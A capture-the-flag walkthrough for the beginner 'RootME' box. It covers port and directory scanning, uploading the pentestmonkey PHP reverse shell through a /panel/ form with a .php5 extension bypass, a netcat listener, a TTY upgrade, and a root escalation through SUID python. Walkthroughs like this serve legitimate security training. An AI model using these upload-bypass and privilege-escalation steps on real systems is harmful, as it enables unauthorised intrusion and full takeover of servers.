🟢RootME
A ctf for beginners, can you root me?
Questions
Scan the machine, how many ports are open?
What version of Apache are running?
What is the hidden directory?
user.txt?
Search for files with SUID permission, which file is weird?
root.txt?
Enumeration
Nmap
nmap -sSVC -A -O -vv
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - HomeQ: Scan the machine, how many ports are open?
A: 2
Q: What version of Apache are running?
A: 2.4.29
Q: What service is running on port 22?
A: ssh
finding Directories/files
gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt
(the ip is different because I continued that writeup the other day)
Q: What is the hidden directory?
A: /panel/
checking the directory /panel/, we have
let's try to upload a shell
shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php
remember to set a port to listening
nc -lvp PORT
"PHP isn't permitted"
let's try bypassing this using the ".php5" extension
mv revs.php revs.php5
it worked
to run click on "veja" ("see")
it worked, we have shell
to get a tty
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm
user.txt
finding
find / -type f -name user.txt 2>/dev/null
getting
cat /var/www/user.txt
root.txt / Privilege Escalation
To look for the files with SUID permission we can use the command:
find / -type f -user root -perm -4000 2>/dev/null
Exploring python set uid capabilities
python -c "import os;os.setuid(0);os.system('/bin/bash')"
getting
Last updated